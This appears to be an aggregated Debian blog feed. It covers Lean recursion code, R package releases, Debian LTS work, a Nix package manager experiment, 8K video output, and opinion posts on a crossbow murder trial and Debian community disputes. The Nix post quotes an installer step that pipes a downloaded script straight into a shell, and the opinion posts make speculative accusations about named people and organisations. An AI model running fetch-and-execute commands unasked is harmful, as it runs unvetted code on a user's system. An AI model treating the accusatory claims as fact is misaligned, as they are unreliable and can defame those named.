Filing tax this year was really painful.
14 March, 2025 01:27AM by Junichi Uekawa
The horrific crossbow murders in Bushey occurred relatively close to where I used to reside in St Albans, Hertfordshire. While the suspect was on the run, I rang some friends who live in the area to ask if they had checked all their doors and windows were really locked.
It was risky to publish so much detail about the case while it was still in progress, knowing that some new evidence might come along to contradict me. As it turns out, the blog was largely correct with its focus on the relevance of social control media and the toxic culture. At the very end of the trial, prosecutors revealed that Kyle Clifford had been following Andrew Tate, justifying my concerns about the role of social control media.
One key piece of evidence appears to be inconsistent: the date of the crossbow purchase. This is really fundamental to understanding what was going on in Clifford's mind. In some reports, they claim he called his brother in prison on 1 July 2024 to declare he had ordered a crossbow. In reports from the same media organizations, sometimes within the same page, they claim he made the purchases on 3 July, that is, the day that his ex-girlfriend shared a Tweet about women leaving their partners.
Examples of the contradiction:
Sometimes journalists do make mistakes with dates. Sometimes lawyers make mistakes with dates. Maybe he had started thinking about the order or started the online shopping cart on 1 July but only made the payment on 3 July. Maybe the conversation with his brother on 1 July was really boasting about something he hadn't actually ordered yet.
The British police themselves have attracted a lot of controversy for their infiltration of environment activist groups and the relationships between undercover police and female activists. Yet when they had this recording of a convicted murderer talking to his brother about the purchase of weapons, they may have had a missed intelligence opportunity.
The news summaries of this horrendous crime only give us the broad brushstrokes. It is very easy to hate this guy. Even the killer's lawyer stood up before the judge and said he was only defending the guy because it was his job to do so but he also thinks it is a particularly despicable crime.
To really deal with the Andrew Tate phenomenon, we need to break it into three phases, which can be easily confirmed using the live feeds from the trial and the "timeline" news articles:
Date(s) | Who | What
---|---|---
23 June | Louise | Begins to communicate the relationship is over
23 June to 2 July | Kyle | Begins plotting, although his only concrete action is to purchase rope and arrange it as a noose for himself in the cemetery
3 July | Louise | Shares / re-tweets comment about women leaving their partners, gives the break-up a public dimension
3 July, 4 July | Kyle | Buys offensive weapons: crossbow, knife, air gun, petrol cans
9 July | Kyle | Triple murder with crossbow and knife
To understand Clifford's feelings when his ex starts to engage in publicity on social control media, we can take a detour and look at the case of one of the four police officers who committed suicide after the January 6 riot at the US Capitol.
Of particular interest is the case of Officer Kyle DeFreytag. DeFreytag was only deployed to the US Capitol after the rioters had been chased away. He was posted there to enforce the curfew in the empty building where five people had been killed earlier in the day. Despite the fact the riot was over, the officers posted there that night must have felt like they were in a haunted house. Moreover, they may have feared a return of the rioters. After all, the rioters had been egged on by the president himself, Donald Trump, who still had another two weeks in office. Trump had used social media and a speech in ways that appeared to encourage civil disorder. Many officers who served in the days after the riot reported feeling a sense of dread and despair, an ongoing trauma. A few months later, DeFreytag became the fourth January 6 suicide victim.
Whether it is the January 6 mob or the vigilantism when a woman starts a rumor on social control media, the sense of apprehension is much the same. I spoke to another man in a high profile position who was subject to vendettas by a woman. Somebody in a more senior position made the mistake of sharing it too quickly. The victim told me that his first response was to get his wife and children out of the house. The mob mentality that grips people in social control media is very similar to the way people behave out of character when they assemble in a large group at a protest or a football match.
When Elon Musk's Twitter/X platform enticed Louise Hunt to make their break-up into a public story, she may not have intended any harm at all. Clifford, on the other hand, may have feared the worst, including the possibility that her celebrity father might share tweets with his 10,000 followers. Clifford's perception of the potential for a mob may have been based on the worst-case scenario; nonetheless, he is not the only man who was taken by this sense of dread. If he saw the break-up becoming a public drama, that doesn't justify the extreme violence but it may help us understand the step change in his behavior.
When Clifford's brother was convicted for murder, it brought about an online wave of public hostility against his family. Most of us never experience something like that. Yet for Clifford, when he saw his ex starting to create a negative narrative on Twitter, his previous experience of social media shamings would have compounded his sense of dread about how Twitter might exploit his current break-up.
Social control media clearly seeks to profit from the public fascination with conflict involving young white women. Sadly, a good profile photo and an emotional story goes a lot further than fact-checked evidence. When journalists hacked the mobile phone of 2002 murder victim Milly Dowler, looking for her last voicemail messages, there was public outrage. The rise of social control media has allowed Elon Musk to profit from tapping into the last thoughts of crossbow victim Louise Hunt. The erosion of this couple's privacy may have been a factor in Clifford's turn for the worse.
The fear of vigilantism doesn't justify Clifford's actions but it does suggest why on 3 July there was a step change in his planning on the day the tweet was shared. Before the tweeting, he appeared to be more concerned with ending his own life but after the tweet, his actions were far worse.
The suicide rate for men is four times higher than for women. Shortly before the crossbow murders, somebody submitted this Freedom of Information request asking how many people had taken their own life on the London Underground. The authorities were unable to reply, partly because the transport department is not responsible for classifying the cause of death, that is the job of the coroner. A report on Wikipedia suggests 643 suicide attempts in the period 2000 to 2010, roughly one per week. It is not clear how many of these relate to relationship breakdown.
People widely commented on the fact that Clifford, who is in prison, could refuse to come to the court for the trial and sentencing. Even the Prime Minister's office in Downing Street made public comment on this feature of the trial. Nonetheless, neither Andrew Tate nor Elon Musk attended the trial either. The content they respectively create and propagate is clearly harmful to people at vulnerable times in their lives.
Look at how Jack Dorsey was confirmed to speak at FOSDEM this year but he changed his mind and canceled at the last minute.
In the victim statement of John Hunt, he stated:
When I challenge myself about how you were able to deceive us all, I simply say that you are a psychopath who, for the duration of your time together with Louise, was able to disguise yourself as an ordinary human being.
We could say similar things for social control media platforms pretending to be like a trusted friend while they are really exploiting people's trust to violate our privacy.
Daily Mail tells us that Kyle purchased the crossbow on the same day Louise re-tweeted.
The Sun tells us about the conversation about "buying" the crossbow on 1 July and also on 3 July.
Sky News sent live updates during the trial. They appear to be paraphrasing a speech by the prosecutor. Once again, it is not clear whether Kyle Clifford really made the actual purchase on 1 July or 3 July.
Louise Hunt's "last tweet" was actually re-tweeting somebody else. Did Kyle Clifford see this and did he only go through with the purchasing of weapons after this impacted him?
I don't want to suggest Louise Hunt intended to start a mob, she is a victim of social media just as much as anybody else. Social media mobs have a mind of their own.
When social control media vigilantism started to spread rumors about Dr Jacob Appelbaum in 2015, it quickly turned into real-world aggression, as evidenced by the graffiti on Dr Appelbaum's home (below). I checked the debian-private gossip messages and proved that the rumors were falsified for what appears to be a sadistic political motive.
How many men fear similar reprisals when somebody makes their life into a subject for public speculation?
After the Irish elections, I canceled the auto-renewal for various domain names that look similar to rival candidates. This means that the registrations will lapse at the end of 12 months, in November 2025 and anybody else can then register the same names.
There are five years between general elections in Ireland and these domain names won't be very useful for me in that period.
Why wait for the domain names to lapse in November? I decided to stagger the transfer of the domain names by releasing the passwords publicly. I'm saving the best for last.
Here is the domain transfer password for NickDelehanty.ie:
To take NickDelehanty.ie from me, you can use any domain name registrar that you prefer. It is currently hosted with Gandi. The Irish .IE registry has a full list of registrars that you can choose from.
There is a good chance that other people may have more creative ideas for using some of the domain names. There are many people with the same name as some of the candidates. I don't want to stand in their way.
At the count center, I reached out to some of the other candidates and let them know I'd be happy to gift the domain names for Christmas. Some of them never got back to me.
In a couple of cases, the candidates had previously owned the domain names and failed to renew them. This creates a much higher risk that somebody could acquire their former domain name and deliberately impersonate them. I'll hold back on releasing those domain names for a little bit longer.
The domain names were acquired in good faith but simply letting the former domain name of the justice minister lapse into the hands of a cybersquatter could create a risk for innocent members of the public. Look at how much money the FSFE people have taken by impersonating the FSF. Politics aside, I'd prefer to just give Jim the domain name so that doesn't happen.
Then again, it raises some ethical questions: if I give a domain name to a member of the cabinet, is it a gift? If he owned it before too, and I've helped him get it back with no real benefit to myself, is it still a gift? If it is a gift and if the transfer of the domain is public knowledge, does that neutralize any ethical concerns and comply with disclosure rules?
I hope my acquisition of the domains will encourage some productive ethical discussions about the role of technology in our democracy. While people are distracted by that, cybersquatters are busy buying up domain names that look like future candidates to replace Pope Francis. It's not polite to say that while people are praying for the Pope's recovery from illness but nonetheless, that is the behavior of real cybersquatters.
Each .IE domain name costs about EUR 20 to register. I haven't even asked anybody to reimburse me for that expense. Every candidate whose vote tally exceeds a quarter of a quota is able to fully recover their expenses, including domain name fees, from public funds.
After somebody takes NickDelehanty.IE off my hands I'll wait a few days and then share the next domain in the list. Please follow my RSS feed to be first to know when the next opportunity appears.
Daniel Pocock is a Debian Developer.
Please see the chronological history of how the Debian harassment and abuse culture evolved.
A few months ago I explained that one reason why this blog has become more quiet is that all my work on Lean is covered elsewhere.
This post is an exception, because it is an observation that is (arguably) interesting, but does not lead anywhere, so where else to put it than my own blog…
Want to share your thoughts about this? Please join the discussion on the Lean community zulip!
When defining a function recursively in Lean that has nested recursion, e.g. a recursive call that is in the argument to a higher-order function like List.map, then extra attention used to be necessary so that Lean can see that xs.map applies its argument only to elements of the list xs. The usual idiom is to write xs.attach.map instead, where List.attach attaches to the list elements a proof that they are in that list. You can read more about this in my Lean blog post on recursive definitions and our new shiny reference manual; look for Example “Nested Recursion in Higher-order Functions”.
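The idiom can be sketched like this (a minimal hypothetical example with a rose-tree type, not code from the post): mapping over t.children.attach hands each child together with a membership proof, which is exactly what the termination checker needs.

```lean
-- Hypothetical rose-tree type for illustration.
structure RoseTree (α : Type u) where
  val : α
  children : List (RoseTree α)

-- The `attach` idiom: `t.children.attach` pairs each child `c` with a
-- proof `c ∈ t.children`, so Lean can see the nested recursive call
-- only receives subtrees of `t` and the termination proof succeeds.
def RoseTree.size (t : RoseTree α) : Nat :=
  1 + (t.children.attach.map (fun ⟨c, _h⟩ => c.size)).sum
```

Writing t.children.map (fun c => c.size) instead would leave the termination checker with no information connecting c to t.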
To make this step less tedious I taught Lean to automatically rewrite xs.map to xs.attach.map (where suitable) within the construction of well-founded recursion, so that nested recursion just works (issue #5471). We already do such a rewriting to change if c then … else … to the dependent if h : c then … else …, but the attach-introduction is much more ambitious (the rewrites are not definitionally equal, there are higher-order arguments etc.). Rewriting the terms in a way that we can still prove the connection later when creating the equational lemmas is hairy at best. Also, we want the whole machinery to be extensible by the user, setting up their own higher order functions to add more facts to the context of the termination proof.
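For comparison, the existing if-rewriting mentioned above can be illustrated with a hypothetical example (not taken from the post): the dependent form puts the condition's hypothesis in scope for the termination proof.

```lean
-- Hypothetical example: with `if h : n = 0 then … else …`, the
-- else-branch carries `h : ¬ n = 0`, which lets Lean discharge the
-- termination goal `n - 1 < n` automatically.
def countdown (n : Nat) : List Nat :=
  if h : n = 0 then [] else n :: countdown (n - 1)
```

With the non-dependent if c then … else …, the fact that n ≠ 0 in the else-branch would not be available to the termination checker, which is why Lean rewrites to the dependent form behind the scenes.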
I implemented it like this (PR #6744) and it ships with 4.18.0, but in the course of this work I thought about a quite different and maybe better™ way to do this, and well-founded recursion in general:
fix
Recall that to use WellFounded.fix

WellFounded.fix : (hwf : WellFounded r) (F : (x : α) → ((y : α) → r y x → C y) → C x) (x : α) : C x

we have to rewrite the functorial of the recursive function, which naturally has type

F : ((y : α) → C y) → ((x : α) → C x)

to the one above, where all recursive calls take the termination proof r y x. This is a fairly hairy operation, mangling the type of the matcher’s motives and whatnot.
Things are simpler for recursive definitions using the new partial_fixpoint machinery, where we use Lean.Order.fix

Lean.Order.fix : [CCPO α] (F : β → β) (hmono : monotone F) : β

so the functorial’s type is unmodified (here β will be ((x : α) → C x)), and everything else is in the propositional side-condition monotone F. For this predicate we have a syntax-guided compositional tactic, and it’s easily extensible, e.g. by
theorem monotone_mapM (f : γ → α → m β) (xs : List α) (hmono : monotone f) :
monotone (fun x => xs.mapM (f x))
Once given, we don’t care about the content of that proof. In particular, proving the unfolding theorem only deals with the unmodified F that closely matches the function definition as written by the user. Much simpler!
Isabelle also supports well-founded recursion, and has great support for nested recursion. And it’s much simpler!
There, all you have to do to make nested recursion work is to define a congruence lemma of the form, for List.map something like our List.map_congr_left

List.map_congr_left : (h : ∀ a ∈ l, f a = g a) :
    List.map f l = List.map g l

This is because in Isabelle, too, the termination proof is a side-condition that essentially states “the functorial F calls its argument f only on smaller arguments”.
I had wished we could do the same in Lean for a while, but that form of congruence lemma just isn’t strong enough for us.
But maybe there is a way to do it, using an existential to give a witness that F can alternatively be implemented using the more restrictive argument. The following callsOn P F predicate can express that F calls its higher-order argument only on arguments that satisfy the predicate P:
section setup
variable {α : Sort u}
variable {β : α → Sort v}
variable {γ : Sort w}
def callsOn (P : α → Prop) (F : (∀ y, β y) → γ) :=
∃ (F': (∀ y, P y → β y) → γ), ∀ f, F' (fun y _ => f y) = F f
variable (R : α → α → Prop)
variable (F : (∀ y, β y) → (∀ x, β x))
local infix:50 " ≺ " => R
def recursesVia : Prop := ∀ x, callsOn (· ≺ x) (fun f => F f x)
noncomputable def fix (wf : WellFounded R) (h : recursesVia R F) : (∀ x, β x) :=
wf.fix (fun x => (h x).choose)
def fix_eq (wf : WellFounded R) h x :
fix R F wf h x = F (fix R F wf h) x := by
unfold fix
rw [wf.fix_eq]
apply (h x).choose_spec
This allows nice compositional lemmas to discharge callsOn predicates:
theorem callsOn_base (y : α) (hy : P y) :
callsOn P (fun (f : ∀ x, β x) => f y) := by
exists fun f => f y hy
intros; rfl
@[simp]
theorem callsOn_const (x : γ) :
callsOn P (fun (_ : ∀ x, β x) => x) :=
⟨fun _ => x, fun _ => rfl⟩
theorem callsOn_app
{γ₁ : Sort uu} {γ₂ : Sort ww}
(F₁ : (∀ y, β y) → γ₂ → γ₁) -- can this also support dependent types?
(F₂ : (∀ y, β y) → γ₂)
(h₁ : callsOn P F₁)
(h₂ : callsOn P F₂) :
callsOn P (fun f => F₁ f (F₂ f)) := by
obtain ⟨F₁', h₁⟩ := h₁
obtain ⟨F₂', h₂⟩ := h₂
exists (fun f => F₁' f (F₂' f))
intros; simp_all
theorem callsOn_lam
{γ₁ : Sort uu}
(F : γ₁ → (∀ y, β y) → γ) -- can this also support dependent types?
(h : ∀ x, callsOn P (F x)) :
callsOn P (fun f x => F x f) := by
exists (fun f x => (h x).choose f)
intro f
ext x
apply (h x).choose_spec
theorem callsOn_app2
{γ₁ : Sort uu} {γ₂ : Sort ww}
(g : γ₁ → γ₂ → γ)
(F₁ : (∀ y, β y) → γ₁) -- can this also support dependent types?
(F₂ : (∀ y, β y) → γ₂)
(h₁ : callsOn P F₁)
(h₂ : callsOn P F₂) :
callsOn P (fun f => g (F₁ f) (F₂ f)) := by
apply_rules [callsOn_app, callsOn_const]
With this setup, we can have the following, possibly user-defined, lemma expressing that List.map calls its arguments only on elements of the list:
theorem callsOn_map (δ : Type uu) (γ : Type ww)
(P : α → Prop) (F : (∀ y, β y) → δ → γ) (xs : List δ)
(h : ∀ x, x ∈ xs → callsOn P (fun f => F f x)) :
callsOn P (fun f => xs.map (fun x => F f x)) := by
suffices callsOn P (fun f => xs.attach.map (fun ⟨x, h⟩ => F f x)) by
simpa
apply callsOn_app
· apply callsOn_app
· apply callsOn_const
· apply callsOn_lam
intro ⟨x', hx'⟩
dsimp
exact (h x' hx')
· apply callsOn_const
end setup
So here is the (manual) construction of a nested map for trees:
section examples
structure Tree (α : Type u) where
val : α
cs : List (Tree α)
-- essentially
-- def Tree.map (f : α → β) : Tree α → Tree β :=
-- fun t => ⟨f t.val, t.cs.map Tree.map⟩)
noncomputable def Tree.map (f : α → β) : Tree α → Tree β :=
fix (sizeOf · < sizeOf ·) (fun map t => ⟨f t.val, t.cs.map map⟩)
(InvImage.wf (sizeOf ·) WellFoundedRelation.wf) <| by
intro ⟨v, cs⟩
dsimp only
apply callsOn_app2
· apply callsOn_const
· apply callsOn_map
intro t' ht'
apply callsOn_base
-- ht' : t' ∈ cs -- !
-- ⊢ sizeOf t' < sizeOf { val := v, cs := cs }
decreasing_trivial
end examples
This makes me happy!
All details of the construction are now contained in a proof that can proceed by a syntax-driven tactic and that’s easily and (likely robustly) extensible by the user. It also means that we can share a lot of code paths (e.g. everything related to equational theorems) between well-founded recursion and partial_fixpoint.
I wonder if this construction is really as powerful as our current one, or if there are certain (likely dependently typed) functions where this doesn’t fit, but the β above is dependent, so it looks good.
With this construction, functions defined by well-founded recursion will reduce even worse in the kernel, I assume. This may be a good thing.
What unfortunately kills this idea, though, is the generation of the functional induction principles, which I believe is not (easily) possible with this construction: The functional induction principle is proved by massaging F to return a proof, but since the extra assumptions (e.g. for ite or List.map) only exist in the termination proof, they are not available in F.
Oh wey, how anticlimactic.
Curiously, if we didn’t have functional induction at this point yet, then very likely I’d change Lean to use this construction, and then we’d either not get functional induction, or it would be implemented very differently, maybe a more syntactic approach that would re-prove termination. I guess that’s called path dependence.
10 March, 2025 05:47PM by Joachim Breitner (mail@joachim-breitner.de)
This was my hundred-twenty-eighth month that I did some work for the Debian LTS initiative, started by Raphael Hertzog at Freexian. During my allocated time I uploaded or worked on:
Last but not least I did some days of FD this month and attended the monthly LTS/ELTS meeting.
This month was the seventy-ninth ELTS month. During my allocated time I uploaded or worked on:
Last but not least I did some days of FD this month and attended the monthly LTS/ELTS meeting.
This month I uploaded new packages or new upstream or bugfix versions of:
This work is generously funded by Freexian!
This month I uploaded new packages or new upstream or bugfix versions of:
Finally matomo was uploaded. Thanks a lot to Utkarsh Gupta and William Desportes for doing most of the work to make this happen.
This work is generously funded by Freexian!
Unfortunately I didn’t find any time to upload packages.
Have you ever heard of poliastro? It was a package to do calculations related to astrodynamics and orbital mechanics. It was archived by upstream at the end of 2023. I am now trying to revive it under the new name boinor and hope to get it back into Debian over the next months.
This is almost the last month that Patrick, our Outreachy intern for the Debian Astro project, is handling his tasks. He is working on automatic updates of the indi 3rd-party drivers.
Unfortunately I didn’t find any time to work on this topic.
This month I uploaded new packages or new upstream or bugfix versions of:
Unfortunately I didn’t find any time to work on this topic.
This month I accepted 437 and rejected 64 packages. The overall number of packages that got accepted was 445.
10 March, 2025 03:33PM by alteholz
An update to our package RcppNLoptExample arrived on CRAN earlier today, marking the first update since the initial release more than four years ago. The nloptr package, created by Jelmer Ypma, has long been providing an excellent R interface to NLopt, a very comprehensive library for nonlinear optimization. In particular, Jelmer carefully exposed the API entry points such that other R packages can rely on NLopt without having to explicitly link to it (as one can rely on R providing sufficient function calling and registration to make this possible by referring back to nloptr, which naturally has the linking information and resolution). This package demonstrates this in a simple-to-use Rcpp example package that can serve as a stanza.
More recent NLopt versions appear to have changed behaviour a little so that an example we relied upon in a simple unit test now converges to a marginally different numerical value, so we adjusted a convergence threshold. Other than that we made a number of the usual small updates to package metadata, to the README.md file, and to continuous integration.
The (very short) NEWS entry follows:
Changes in version 0.0.2 (2025-03-09)
Updated tolerance in simple test as newer upstream nlopt changed behaviour ever so slightly, leading to another spurious failure
Numerous small and standard updates to DESCRIPTION, README.md, badges, and continuous integration setup
Courtesy of my CRANberries, there is also a diffstat report for this release. For questions, suggestions, or issues please use the issue tracker at the GitHub repo.
This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. If you like this or other open-source work I do, you can now sponsor me at GitHub.
Adrian von Bidder-Senn died on 17 April 2011. The date is confirmed in numerous places. I have already pointed out previously that this death, which may be part of the Debian Suicide Cluster, occurred on the same day as our wedding. What an incredible gift from the Debian "family".
Another key fact is that it was Palm Sunday, the Sunday before Easter. On Palm Sunday, the Bible tells us the story of Jesus Christ arriving in Jerusalem:
Jesus wept (John 11:35). Yes, Jesus knew that he would raise Lazarus from the dead, but that did not stop him from feeling the pain of his death here and now. And the onlookers recognized the significance of this. So the Jews said, "See how he loved him!" (John 11:36)
The implication is that Jesus knew he was going to die. Why didn't he simply turn around and go back?
But God demonstrates his own love for us in this: while we were still sinners, Christ died for us. (Romans 5:8)
Adrian's widow is Diana von Bidder-Senn, who now has a role in the Evangelical People's Party of Switzerland (EVP). In German, the term Evangelical is equivalent to the term Protestant in English. It is essentially a Christian-democratic party.
Basel, where they lived, is considered a Protestant canton/city, although in practice the role of religion is gradually declining in Switzerland. The number of Catholics in Basel is almost on par with the number of Protestants.
In recent years, rogue Debianists have insulted my family with all sorts of rumors. Coincidentally, the cousin who was in Cardinal Pell's choir was a witness at our wedding, once again, on the same day that Adrian von Bidder-Senn died, Palm Sunday. Where was I on the day the Cardinal died? In Italy. Was it the fault of the rogue Debianists, the Cardinal, or a bit of both?
Please see the chronological history of how the Debian harassment and abuse culture evolved.
A new (mostly maintenance) release 0.2.3 of RcppTOML is now on CRAN.
TOML is a file format that is most suitable for configurations, as it is meant to be edited by humans but read by computers. It emphasizes strong readability for humans while at the same time supporting strong typing as well as immediate and clear error reports. On small typos you get parse errors, rather than silently corrupted garbage. Much preferable to any and all of XML, JSON or YAML – though sadly these may be too ubiquitous now. TOML is frequently being used with projects such as the Hugo static blog compiler, or the Cargo system of Crates (aka “packages”) for the Rust language.
This release was tickled by another CRAN request: just like yesterday’s release and the RcppDate release two days ago, it responds to the esoteric ‘whitespace in literal operator’ deprecation warning. We alerted upstream too.
The short summary of changes follows.
Changes in version 0.2.3 (2025-03-08)
Correct the minimum version of Rcpp to 1.0.8 (Walter Somerville)
The package now uses Authors@R as mandated by CRAN
Updated 'whitespace in literal' issue upsetting clang++-20
Continuous integration updates including simpler r-ci setup
Courtesy of my CRANberries, there is also a diffstat report for this release. For questions, suggestions, or issues please use the issue tracker at the GitHub repo.
This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. If you like this or other open-source work I do, you can now sponsor me at GitHub.
A new release 0.1.13 of the RcppSimdJson package is now on CRAN.
RcppSimdJson wraps the fantastic and genuinely impressive simdjson library by Daniel Lemire and collaborators. Via very clever algorithmic engineering to obtain largely branch-free code, coupled with modern C++ and newer compiler instructions, it parses gigabytes of JSON per second, which is quite mindboggling. The best-case performance is ‘faster than CPU speed’ as use of parallel SIMD instructions and careful branch avoidance can lead to less than one cpu cycle per byte parsed; see the video of the talk by Daniel Lemire at QCon.
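To put "less than one cpu cycle per byte" in perspective, a back-of-the-envelope calculation (the 3.5 GHz figure is an assumed clock speed, not from simdjson's benchmarks):

```python
cpu_hz = 3.5e9          # assumed clock speed of one core
cycles_per_byte = 1.0   # simdjson's best case is below this
bytes_per_second = cpu_hz / cycles_per_byte
print(bytes_per_second / 1e9)  # 3.5, i.e. at least 3.5 GB of JSON per second per core
```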
This release was tickled by another CRAN request: just like yesterday’s RcppDate release, it responds to the esoteric ‘whitespace in literal operator’ deprecation warning. Turns out that upstream simdjson had this fixed a few months ago as the node bindings package ran into it. Other changes include a bit of earlier polish by Daniel, another CRAN mandated update, CI improvements, and a move of two demos to examples/ to avoid having to add half a dozen packages to Suggests: for no real usage gain in the package.
The short NEWS entry for this release follows.
Changes in version 0.1.13 (2025-03-07)
A call to std::string::erase is now guarded (Daniel)
The package now uses Authors@R as mandated by CRAN (Dirk)
simdjson was upgraded to version 3.12.2 (Dirk)
Continuous integration updated to more compilers and simpler setup
Two demos are now in inst/examples to not inflate Suggests
Courtesy of my CRANberries, there is also a diffstat report for this release. For questions, suggestions, or issues please use the issue tracker at the GitHub repo.
This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. If you like this or other open-source work I do, you can now sponsor me at GitHub.
This month I didn't have any particular focus. I just worked on issues in my info bubble.
The SWH work was sponsored. All other work was done on a volunteer basis.
In case you haven't noticed, I'm trying to post, and one of the things that entails is just dumping a bunch of draft notes over the fence. In this specific case, I had a set of rough notes about NixOS and particularly Nix, the package manager.
In this case, you can see the very birth of an article, what it looks like before it becomes the questionable prose it is now, by looking at the Git history of this file, particularly its birth. I have a couple of those left, and it would be pretty easy to publish them as is, but I feel I'd be doing others (and myself! I write for my own documentation too after all) a disservice by not going the extra mile on those.
So here's the long version of my experiment with Nix.
A couple friends are real fans of Nix. Just like I work with Puppet a lot, they deploy and maintain servers (if not fleets of servers) with NixOS and its declarative package management system. Essentially, they use it as a configuration management system, which is pretty awesome.
That, however, is a bit too high of a bar for me. I rarely try new operating systems these days: I'm a Debian developer and it takes most of my time to keep that functional. I'm not going to go around messing with other systems as I know that would inevitably get me dragged down into contributing into yet another free software project. I'm mature now and know where to draw the line. Right?
So I'm just testing Nix, the package manager, on Debian, because I learned from my friend that nixpkgs is the largest package repository out there, with a mind-boggling 100,000 packages at the time of writing (88% of them up to date), compared to around 40,000 in Debian (or 72,000 if you count binary packages, with 72% up to date). I naively thought Debian was the largest, perhaps competing with Arch, and I was wrong: Arch is larger than Debian too.
What brought me there is I wanted to run Harper, a fast spell-checker written in Rust. The logic behind using Nix instead of just downloading the source and running it myself is that I delegate the work of supply-chain integrity checking to a distributor, a bit like you trust Debian developers like myself to package things in a sane way. I know this widens the attack surface to a third party of course, but the rationale is that I shift cryptographic verification to another stack than just "TLS + GitHub" (although that is somewhat still involved) that's linked with my current chain (Debian packages).
I have since then stopped using Harper for various reasons and also wrapped up my Nix experiment, but felt it worthwhile to jot down some observations on the project.
Overall, Nix is hard to get into, with a complicated learning curve. I have found the documentation to be a bit confusing, since there are many ways to do certain things. I particularly tripped on "flakes" and, frankly, incomprehensible error reporting.
It didn't help that I tried to run nixpkgs on Debian, which is technically possible, but you can tell I'm not supposed to be doing this. My friend who reviewed this article expressed surprise at how easy this was, but then he only saw the finished result, not me tearing my hair out to make this actually work.
So here's how I got started. First I installed the nix binary package:
apt install nix-bin
Then I had to add myself to the right group and logout/log back in to get the rights to deploy Nix packages:
adduser anarcat nix-users
That wasn't easy to find, but is mentioned in the README.Debian file shipped with the Debian package.
Then, I didn't write this down, but the README.Debian file above mentions it, so I think I added a "channel" like this:
nix-channel --add https://nixos.org/channels/nixpkgs-unstable nixpkgs
nix-channel --update
And I likely installed the Harper package with:
nix-env --install harper
At this point, harper was installed in a ... profile? Not sure. I had to add ~/.nix-profile/bin (a symlink to /nix/store/sympqw0zyybxqzz6fzhv03lyivqqrq92-harper-0.10.0/bin) to my $PATH environment for this to actually work.
Those last two commands (nix-channel and nix-env) were hard to figure out, which is kind of amazing because you'd think a tutorial on Nix would feature something like this prominently. But three different tutorials failed to bring me up to that basic setup; even the README.Debian didn't spell it out clearly.
The tutorials all show me how to develop packages for Nix, not plainly how to install Nix software. This is presumably because "I'm doing it wrong": you shouldn't just "install a package", you should setup an environment declaratively and tell it what you want to do.
But here's the thing: I didn't want to "do the right thing". I just wanted to install Harper, and documentation failed to bring me to that basic "hello world" stage. Here's what one of the tutorials suggests as a first step, for example:
curl -L https://nixos.org/nix/install | sh
nix-shell --packages cowsay lolcat
nix-collect-garbage
... which, when you follow through, leaves you with almost precisely nothing installed (apart from Nix itself, set up with a nasty "curl pipe bash"). So while that works for testing Nix, you're not much better off than when you started.
Now that I have stopped using Harper, I don't need Nix anymore, which I'm sure my Nix friends will be sad to read about. Don't worry, I have notes now, and can try again!
But still, I wanted to clear things out, so I did this, as root:
deluser anarcat nix-users
apt purge nix-bin
rm -rf /nix ~/.nix*
I think this cleared things out, but I'm not actually sure.
This blurb wouldn't be complete without a mention that the Nix community has been somewhat tainted by the behavior of its founder. I won't bother you too much with this; LWN covered it well in 2024, and made a followup article about spinoffs and forks that's worth reading as well.
I did want to say that everyone I have been in contact with in the Nix community was absolutely fantastic. So I am really sad that the behavior of a single individual can pollute a community in such a way.
As a leader, if you have but one responsibility, it's to behave properly toward the people around you. It's actually really, really hard to do, because yes, it means you need to act differently than others, and no, you just don't get to be upset at others like you normally would with friends, because you're in a position of authority.
It's a lesson I'm still learning myself, to be fair. But at least I don't work with arms manufacturers; or, if I did, I would sure as hell take the nick (or nix?) on the chin when people got upset, and try to make amends.
So long live the Nix people! I hope the community recovers from that dark moment, so far it seems like it will.
And thanks for helping me test Harper!
RcppDate wraps the featureful date library written by Howard Hinnant for use with R. This header-only modern C++ library has been in pretty widespread use for a while now, and adds to C++11/C++14/C++17 what is (with minor modifications) the ‘date’ library in C++20. RcppDate adds no extra R or C++ code and can therefore be a zero-cost dependency for any other project; yet a number of other projects decided to re-vendor it, resulting in less-efficient duplication. Oh well. C’est la vie.
This release syncs with the (already mostly included) upstream release 3.0.3, and also addresses a fresh (and mildly esoteric) nag from clang++-20. One upstream PR already addressed this in the files tickled by some CRAN packages; I followed this up with another upstream PR addressing it in a few more occurrences.
Changes in version 0.0.5 (2025-03-06)
Updated to upstream version 3.0.3
Updated 'whitespace in literal' issue upsetting clang++-20; this is also fixed upstream via two PRs
Courtesy of my CRANberries, there is also a diffstat report for the most recent release. More information is available at the repository or the package page.
This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. If you like this or other open-source work I do, you can sponsor me at GitHub.
I previously blogged about getting an 8K TV [1]. Now I’m working on getting 8K video out of a computer that talks to it. I borrowed an NVidia RTX A2000 card which according to its specs can do 8K [2] with a mini-DisplayPort to HDMI cable rated for 8K, but on both Windows and Linux the two highest resolutions on offer are 3840*2160 (regular 4K) and 4096*2160, which is strange and not useful.
The various documents on the A2000 differ on whether it has DisplayPort version 1.4 or 1.4a. According to the DisplayPort Wikipedia page [3] both versions 1.4 and 1.4a have a maximum of HBR3 speed and the difference is what version of DSC (Display Stream Compression [4]) is in use. DSC apparently causes no noticeable loss of quality for movies or games but apparently can be bad for text. According to the DisplayPort Wikipedia page version 1.4 can do 8K uncompressed at 30Hz or 24Hz with high dynamic range. So this should be able to work.
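A rough sanity check of that uncompressed-8K-at-30Hz claim, assuming 24-bit colour and ignoring blanking-interval overhead (so the real requirement is somewhat higher):

```python
# Payload bit rate for uncompressed 8K at 30 Hz, 24 bits per pixel:
width, height, refresh, bpp = 7680, 4320, 30, 24
payload_gbps = width * height * refresh * bpp / 1e9   # about 23.9 Gbit/s

# HBR3 is 4 lanes at 8.1 Gbit/s raw; 8b/10b coding leaves about 25.92 Gbit/s:
hbr3_effective_gbps = 4 * 8.1 * 0.8
print(round(payload_gbps, 1), payload_gbps < hbr3_effective_gbps)  # 23.9 True
```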
My theories as to why it doesn’t work are:
To get some more input on this issue I posted on Lemmy, here is the Lemmy post [5]. I signed up to lemmy.ml because it was the first one I found that seemed reasonable and was giving away free accounts. I haven’t tried any others and can’t review it, but it seems to work well enough and it’s free. It’s described as “A community of privacy and FOSS enthusiasts, run by Lemmy’s developers”, which is positive. I recommend that everyone who’s into FOSS create an account there or on some other Lemmy server.
